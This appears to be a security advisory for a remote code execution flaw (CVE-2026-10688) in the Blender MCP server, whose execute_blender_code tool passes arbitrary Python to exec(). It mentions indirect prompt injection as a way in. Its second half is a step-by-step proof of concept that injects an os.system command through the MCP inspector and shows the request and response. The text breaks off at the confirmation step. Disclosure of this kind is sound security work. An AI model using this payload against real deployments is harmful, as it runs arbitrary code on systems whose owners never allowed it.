CVE-2026-10688

An attacker can remotely trigger this vulnerability by sending a specially crafted command to the Blender MCP server. The server forwards this command, which contains arbitrary Python code, to the Blender addon. The addon then executes this code using `exec()`, allowing the attacker to run commands with the privileges of the Blender process [ref_id=2]. This can be achieved through methods like indirect prompt injection [ref_id=2].

The vulnerability resides in the `execute_blender_code` function within the file `/src/blender_mcp/server.py`. This function forwards the `code` parameter to the Blender addon's `execute_code` method, which then passes it to the `exec()` function in `/addon.py` [ref_id=2].

The advisory does not specify a patch or provide remediation guidance. The project was informed of the problem but has not responded. Therefore, no fix is currently available.

npx @modelcontextprotocol/inspector -- uv run blender-mcp

Click Connect Go to the Tools tab and click List Tools Select the execute_blender_code tool Verify the file /tmp/TEST does not exist: It shows: No such file or directory Back to the Inspector, in the code parameter, enter: import os; os.system('id > /tmp/TEST') and click Run Tool. Observe the request being sent: { "method": "tools/call", "params": { "name": "execute_blender_code", "arguments": { "code": "import os; os.system('id >> /tmp/TEST')" }, "_meta": { "progressToken": 1 } } } Response: { "content": [ { "type": "text", "text": "Code executed successfully: " } ], "isError": false } Confirm that the injected command executed: